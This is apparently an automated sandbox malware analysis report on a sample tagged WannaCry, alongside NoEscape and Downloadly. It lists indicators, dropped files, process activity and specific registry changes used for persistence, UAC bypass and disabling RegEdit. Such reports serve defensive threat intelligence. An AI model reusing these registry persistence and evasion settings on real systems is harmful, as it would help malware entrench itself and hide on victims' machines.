Malware Analysis Report

2025-06-16 06:42

Sample ID 240222-ggr71adc74
Target sample
SHA256 70b68ac1477e49a4342383c6eff1056f6a18ff0727aa20630e9e7bc8701011f1
Tags
wannacry discovery evasion persistence ransomware spyware stealer trojan worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

70b68ac1477e49a4342383c6eff1056f6a18ff0727aa20630e9e7bc8701011f1

Threat Level: Known bad

The file sample was found to be: Known bad.

Malicious Activity Summary

wannacry discovery evasion persistence ransomware spyware stealer trojan worm

Wannacry

Modifies WinLogon for persistence

UAC bypass

Deletes shadow copies

Disables RegEdit via registry modification

Reads user/profile data of web browsers

Drops startup file

Modifies file permissions

Executes dropped EXE

Loads dropped DLL

Checks installed software on the system

Drops desktop.ini file(s)

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Sets desktop wallpaper using registry

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

NTFS ADS

Modifies data under HKEY_USERS

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-22 05:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-22 05:46

Reported

2024-02-22 06:04

Platform

win11-20240221-en

Max time kernel

997s

Max time network

998s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\sample

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\winnt32.exe" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDD0AC.tmp C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected] N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDD0C2.tmp C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected] N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\crashpad_handler.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\Downloadly = "\"C:\\Users\\Admin\\Programs\\Downloadly\\Downloadly.exe\"" C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sjlfnnfcj325 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_WannaCrypt0r.zip\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\Downloadly = "\"C:\\Users\\Admin\\Programs\\Downloadly\\Downloadly.exe\"" C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\noescape.png" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnt32.exe C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File opened for modification C:\Windows\winnt32.exe C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File created C:\Windows\winnt32.exe\:Zone.Identifier:$DATA C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "156" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1637591879-962683004-3585269084-1000\{9CF847B0-88EA-4887-823D-18635AAE32A5} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\Downloadly.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\NoEscape.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\winnt32.exe\:Zone.Identifier:$DATA C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File opened for modification C:\Users\Admin\Downloads\YouAreAnIdiot.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\YouAreAnIdiot (1).zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
